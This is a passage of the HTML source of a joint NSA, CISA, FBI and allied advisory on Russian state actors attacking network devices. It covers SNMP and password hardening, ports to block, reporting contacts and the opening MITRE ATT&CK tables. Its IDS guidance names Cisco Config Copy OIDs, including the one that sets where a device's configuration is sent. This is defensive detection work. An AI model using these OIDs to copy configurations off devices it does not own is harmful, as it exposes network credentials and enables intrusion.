&lt;li&gt;Disable SNMPv1 and SNMPv2. These are legacy protocols and should no longer be needed on current devices. If they are necessary, change all community strings from defaults and only allow read-only community strings rather than read-write access.&lt;/li&gt;
&lt;li&gt;SNMPv3 adds strong authentication and data encryption that are unavailable in SNMPv1 and v2. SNMPv3 replaces clear text shared passwords, known as community strings, with more securely encoded parameters, and authenticates and encrypts data [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:MessageAuthentication&quot; target=&quot;_blank&quot;&gt;D3-MAN&lt;/a&gt;, &lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:MessageEncryption&quot; target=&quot;_blank&quot;&gt;D3-MENCR&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Use strong, unique passwords for local accounts on network devices and configure credentials to be stored securely to prevent reuse of compromised passwords [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:CredentialHardening&quot; target=&quot;_blank&quot;&gt;D3-CH&lt;/a&gt;].
&lt;ul&gt;
&lt;li&gt;Cisco devices protect passwords in the configuration file using different hashing types. Use hashing type 8 for user credentials. Avoid using hashing type 0, 4, and 7 as they are insecure or store passwords in plaintext in the configuration file.&amp;nbsp;[&lt;a href=&quot;#Work4&quot;&gt;4&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;Monitor for unusual credentials that do not conform to standard organizational naming conventions [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:PlatformMonitoring&quot; target=&quot;_blank&quot;&gt;D3-PM&lt;/a&gt;].&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Monitor for and alert on logins using local accounts. Local accounts should only be used in emergency situations when accounts supported by centralized authentication servers are unavailable. Centralized authentication to network devices should support multi-factor authentication where feasible. [&lt;a href=&quot;#Work3&quot;&gt;3&lt;/a&gt;]&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Monitor and restrict access to SNMP OIDs using a Management Information Base (MIB) allow list [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening&quot; target=&quot;_blank&quot;&gt;D3-ACH&lt;/a&gt;]. [&lt;a href=&quot;#Work5&quot;&gt;5&lt;/a&gt;] Reference the vendor-specific MIB for the network devices and monitor OIDs for indications of reconnaissance or misconfiguration in logs or intrusion detection systems (IDS). IDS rules should be written for inbound SNMP Set-Requests that contain OIDs targeting sensitive device data [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:PlatformMonitoring&quot; target=&quot;_blank&quot;&gt;D3-PM&lt;/a&gt;].&lt;br&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Example OIDs include:
&lt;ul&gt;
&lt;li&gt;1.3.6.1.4.1.9.9.96.1.1 (Cisco Config Copy)&lt;/li&gt;
&lt;li&gt;1.3.6.1.4.1.9.9.96.1.1.1.1.5 (Config Copy Server Address, value for this OID is where the configuration file is being sent to)&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Restrict management protocols [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficFiltering&quot; target=&quot;_blank&quot;&gt;D3-NTF&lt;/a&gt;].
&lt;ul&gt;
&lt;li&gt;Use Access Control Lists (ACLs) to only allow management protocols, such as SNMP, from management devices, preferably on an out-of-band network. [&lt;a href=&quot;#Work3&quot;&gt;3&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;On edge firewalls and devices deny all external communications on the following ports unless mission critical, with strict monitoring if blocking is not feasible:
&lt;ul&gt;
&lt;li&gt;User Datagram Protocol (UDP) port 69 (TFTP)&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Transmission Control Protocol (TCP) port 4786 (SMI)&lt;/li&gt;
&lt;li&gt;UDP ports 161 and 162 (SNMP)&lt;/li&gt;
&lt;li&gt;TCP/UDP ports 10161 and 10162 (SNMPv3)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Update network device software and firmware images, especially to patch known vulnerabilities, and upgrade end-of-life devices to supported ones.&amp;nbsp;&lt;br&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Use an attack surface management service to identify and secure Internet-facing systems with weak configurations and known vulnerabilities [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkVulnerabilityAssessment&quot; target=&quot;_blank&quot;&gt;D3-NVA&lt;/a&gt;].
&lt;ul&gt;
&lt;li&gt;U.S.-based federal, state, local, tribal, and territorial governments and U.S. critical infrastructure organiztions should consider signing up for CISA’s no-cost &lt;a href=&quot;https://www.cisa.gov/cyber-hygiene-services&quot;&gt;Cyber Hygiene services&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;U.S. Defense Industrial Base organizations should consider signing up for &lt;a href=&quot;https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/DIB-Cybersecurity-Services/&quot; target=&quot;_blank&quot;&gt;NSA’s DIB Cybersecurity Services&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Resources&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;United States:&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia&quot;&gt;Russia Threat Overview and Advisories&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF&quot; target=&quot;_blank&quot;&gt;Network Infrastructure Security Guide&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Canada:&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cyber.gc.ca/en/guidance/routers-cyber-security-best-practices-itsap80019&quot; target=&quot;_blank&quot;&gt;Routers cyber security best practices (ITSAP.80.019)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cyber.gc.ca/en/guidance/security-considerations-edge-devices-itsm80101&quot; target=&quot;_blank&quot;&gt;Security considerations for edge devices (ITSM.80.101)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062&quot; target=&quot;_blank&quot;&gt;Guidance on securely configuring network protocols (ITSP.40.062)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cyber.gc.ca/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022&quot; target=&quot;_blank&quot;&gt;Baseline security requirements for network security zones (ITSP.80.022)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cyber.gc.ca/en/guidance/top-10-it-security-actions-protect-internet-connected-networks-and-information-itsm10089&quot; target=&quot;_blank&quot;&gt;Top 10 IT security actions to protect Internet-connected networks and information (ITSM.10.089)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Works cited&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;[&lt;a class=&quot;ck-anchor&quot; id=&quot;Work1&quot;&gt;1&lt;/a&gt;] FBI. Russian Government Cyber Actors Targeting Networking Devices, Critical Infrastructure. Alert Number: I-082025-PSA. 2025.&amp;nbsp;&lt;a href=&quot;https://www.ic3.gov/PSA/2025/PSA250820&quot; target=&quot;_blank&quot;&gt;https://www.ic3.gov/PSA/2025/PSA250820&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[&lt;a class=&quot;ck-anchor&quot; id=&quot;Work2&quot;&gt;2&lt;/a&gt;] NSA. Cisco Smart Install Protocol Misuse. 2017.&amp;nbsp;&lt;a href=&quot;https://media.defense.gov/2019/Jul/16/2002157833/-1/-1/0/CSA-CISCO-SMART-INSTALL-PROTOCOL-MISUSE.PDF&quot; target=&quot;_blank&quot;&gt;https://media.defense.gov/2019/Jul/16/2002157833/-1/-1/0/CSA-CISCO-SMART-INSTALL-PROTOCOL-MISUSE.PDF&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[&lt;a class=&quot;ck-anchor&quot; id=&quot;Work3&quot;&gt;3&lt;/a&gt;] NSA. Network Infrastructure Security Guide. 2023.&amp;nbsp;&lt;a href=&quot;https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF&quot; target=&quot;_blank&quot;&gt;https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[&lt;a class=&quot;ck-anchor&quot; id=&quot;Work4&quot;&gt;4&lt;/a&gt;] NSA. Cybersecurity Information Sheet Cisco Password Types: Best Practices. 2022.&amp;nbsp;&lt;a href=&quot;https://media.defense.gov/2022/Feb/17/2002940795/-1/-1/0/CSI_CISCO_PASSWORD_TYPES_BEST_PRACTICES_20220217.PDF&quot; target=&quot;_blank&quot;&gt;https://media.defense.gov/2022/Feb/17/2002940795/-1/-1/0/CSI_CISCO_PASSWORD_TYPES_BEST_PRACTICES_20220217.PDF&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[&lt;a class=&quot;ck-anchor&quot; id=&quot;Work5&quot;&gt;5&lt;/a&gt;] NSA.&amp;nbsp;Cybersecurity Information Sheet: Reducing the Risk of Simple Network Management Protocol (SNMP) Abuse. 2026.&amp;nbsp;&lt;a href=&quot;https://media.defense.gov/2026/Jul/09/2003959459/-1/-1/0/CSI_REDUCING_RISK_OF_SNMP_ABUSE.PDF&quot; target=&quot;_blank&quot;&gt;https://media.defense.gov/2026/Jul/09/2003959459/-1/-1/0/CSI_REDUCING_RISK_OF_SNMP_ABUSE.PDF&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Footnotes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt;&lt;sup&gt; &amp;nbsp;&lt;/sup&gt;Národní úřad pro kybernetickou a informační bezpečnost&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot2&quot;&gt;&lt;sup&gt;2&amp;nbsp;&lt;/sup&gt;&lt;/a&gt; Forsvarets Efterretningstjeneste&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt; Välisluureamet&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt; Riigi Infosüsteem Amet&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot5&quot;&gt;&lt;sup&gt;5&lt;/sup&gt;&lt;/a&gt; Sotilastiedustelu&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot6&quot;&gt;&lt;sup&gt;6&lt;/sup&gt;&lt;/a&gt; Suojelupoliisi&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot7&quot;&gt;&lt;sup&gt;7&lt;/sup&gt;&lt;/a&gt; Agence nationale de la sécurité des systèmes d’information&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot8&quot;&gt;&lt;sup&gt;8&lt;/sup&gt;&lt;/a&gt; Agenzia Informazioni e Sicurezza Esterna&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot9&quot;&gt;&lt;sup&gt;9&lt;/sup&gt;&lt;/a&gt; Agenzia Informazioni e Sicurezza Interna&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot10&quot;&gt;&lt;sup&gt;10&lt;/sup&gt;&lt;/a&gt; Służba Kontrwywiadu Wojskowego&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot11&quot;&gt;&lt;sup&gt;11&lt;/sup&gt;&lt;/a&gt; Nationellt Cybersäkerhetscenter&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot12&quot;&gt;&lt;sup&gt;12&lt;/sup&gt;&lt;/a&gt;&lt;sup&gt; &lt;/sup&gt;MITRE and ATT&amp;amp;CK are registered trademarks of The MITRE Corporation. MITRE DEFEND is a trademark of the MITRE Corporation.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Foot13&quot;&gt;&lt;sup&gt;13&lt;/sup&gt;&lt;/a&gt; &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2008-4128&quot; target=&quot;_blank&quot;&gt;CVE-2008-4128&lt;/a&gt; only affects&amp;nbsp;end-of-life Cisco devices.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Disclaimer of Endorsement&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The information and opinions contained in this document are provided &quot;as is&quot; and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Contact&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;United States organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;National Security Agency (NSA)&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Cybersecurity Report Feedback:&amp;nbsp;&lt;a href=&quot;mailto:CybersecurityReports@nsa.gov&quot;&gt;CybersecurityReports@nsa.gov&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Defense Industrial Base Inquiries and Cybersecurity Services:&amp;nbsp;&lt;a href=&quot;mailto:DIB_Defense@cyber.nsa.gov&quot;&gt;DIB_Defense@cyber.nsa.gov&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721,&amp;nbsp;&lt;a href=&quot;mailto:MediaRelations@nsa.gov&quot;&gt;MediaRelations@nsa.gov&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cybersecurity and Infrastructure Security Agency (CISA)&lt;/strong&gt; and&lt;strong&gt; Federal Bureau of Investigation (FBI)&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s&amp;nbsp;&lt;a href=&quot;https://myservices.cisa.gov/irf&quot; title=&quot;Incident Reporting System&quot;&gt;Incident Reporting System&lt;/a&gt;, its 24/7 Operations Center (&lt;a href=&quot;mailto:report@cisa.gov&quot;&gt;report@cisa.gov&lt;/a&gt; or 888-282-0870), or your&amp;nbsp;&lt;a href=&quot;https://www.fbi.gov/contact-us/field-offices&quot; target=&quot;_blank&quot;&gt;local FBI field office&lt;/a&gt;. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;United States Department of Defense Cyber Crime Center (DC3) &amp;nbsp;&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Defense Industrial Base Inquiries and Cybersecurity Services:&amp;nbsp;&lt;a href=&quot;mailto:DC3.DCISE@us.af.mil&quot;&gt;DC3.DCISE@us.af.mil&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at&amp;nbsp;&lt;a href=&quot;https://dibnet.dod.mil/&quot; target=&quot;_blank&quot; title=&quot;https://dibnet.dod.mil/&quot;&gt;https://dibnet.dod.mil&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Media Inquiries / Press Desk:&amp;nbsp;&lt;a href=&quot;mailto:DC3.Information@us.af.mil&quot;&gt;DC3.Information@us.af.mil&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Australian organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Australian Signals Directorate&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Visit&amp;nbsp;&lt;a href=&quot;https://www.cyber.gov.au/about-us/about-asd-acsc/contact-us#no-back&quot; target=&quot;_blank&quot;&gt;cyber.gov.au&lt;/a&gt; or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Canadian organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices.&amp;nbsp;
&lt;ul&gt;
&lt;li&gt;Report an incident or suspicious activity to the Cyber Centre by email at&amp;nbsp;&lt;a href=&quot;mailto:contact@cyber.gc.ca&quot;&gt;contact@cyber.gc.ca&lt;/a&gt;, online via the reporting tool&amp;nbsp;&lt;a href=&quot;https://www.cyber.gc.ca/en/incident-management&quot; target=&quot;_blank&quot;&gt;Report a cyber incident - Canadian Centre for Cyber Security&lt;/a&gt; or by phone at 1-833-CYBER-88 (1-833-292-3788).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;New Zealand organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;New Zealand National Cyber Security Centre (NCSC-NZ):&amp;nbsp;&lt;a href=&quot;mailto:info@ncsc.govt.nz&quot;&gt;info@ncsc.govt.nz&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;United Kingdom organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Report significant cyber security incidents to&amp;nbsp;&lt;a href=&quot;https://ncsc.gov.uk/report-an-incident&quot; target=&quot;_blank&quot;&gt;ncsc.gov.uk/report-an-incident&lt;/a&gt; (monitored 24/7)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Estonia organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Estonian Foreign Intelligence Service (EFIS):&amp;nbsp;&lt;a href=&quot;mailto:info@valisluureamet.ee&quot;&gt;info@valisluureamet.ee&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Finnish organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Finnish Security and Intelligence Service:&amp;nbsp;&lt;a href=&quot;https://supo.fi/en/contact&quot; target=&quot;_blank&quot;&gt;supo.fi/en/contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;French organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at:&amp;nbsp;&lt;a href=&quot;mailto:cert-fr@ssi.gouv.fr&quot;&gt;cert-fr@ssi.gouv.fr&lt;/a&gt; or by phone at: 3218 or +33 9 70 83 32 18.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Italian Organizations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Italian External Intelligence and Security Agency (AISE):&amp;nbsp;
&lt;ul&gt;
&lt;li&gt;Visit &lt;a href=&quot;https://www.sicurezzanazionale.gov.it/&quot; target=&quot;_blank&quot;&gt;https://www.sicurezzanazionale.gov.it/&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Italian Internal Intelligence and Security Agency (AISI):&amp;nbsp;
&lt;ul&gt;
&lt;li&gt;Visit &lt;a href=&quot;https://www.sicurezzanazionale.gov.it/&quot; target=&quot;_blank&quot;&gt;https://www.sicurezzanazionale.gov.it/&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;AppA&quot;&gt;&lt;strong&gt;Appendix A: MITRE ATT&amp;amp;CK tactics and techniques&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt; through &lt;a href=&quot;#Table10&quot;&gt;&lt;strong&gt;Table 10&lt;/strong&gt;&lt;/a&gt; for all the threat actor tactics and techniques referenced in this advisory.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table&amp;nbsp;1: Reconnaissance&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table1&quot;&gt;&lt;/a&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Active Scanning: Scanning IP Blocks&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1595/001/&quot; target=&quot;_blank&quot;&gt;T1595.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Scan range of IP addresses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Active Scanning: Vulnerability Scanning&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1595/002/&quot; target=&quot;_blank&quot;&gt;T1595.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Scan victims for vulnerabilities that can be used during targeting&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 2: Resource Development&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Acquire Infrastructure: Virtual Private Servers&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1583/003/&quot; target=&quot;_blank&quot;&gt;T1583.003&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Leverage VPS as infrastructure&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compromise Infrastructure: Network Devices&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1584/008/&quot; target=&quot;_blank&quot;&gt;T1584.008&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Compromise intermediate routers&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Obtain Capabilities: Exploits&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/005/&quot; target=&quot;_blank&quot;&gt;T1588.005&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Use publicly available code to exploit vulnerable devices&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 3: Initial Access&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exploit Public-Facing Application&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1190/&quot; target=&quot;_blank&quot;&gt;T1190&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
&lt;td&gt;Exploit publicly known CVEs&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Proxy&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1090/&quot; target=&quot;_blank&quot;&gt;T1090&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Use a connection proxy to direct network traffic&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 4: Execution&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;System Services&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1569/&quot; target=&quot;_blank&quot;&gt;T1569&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Executing commands via SNMP&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 5: Privilege Escalation&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
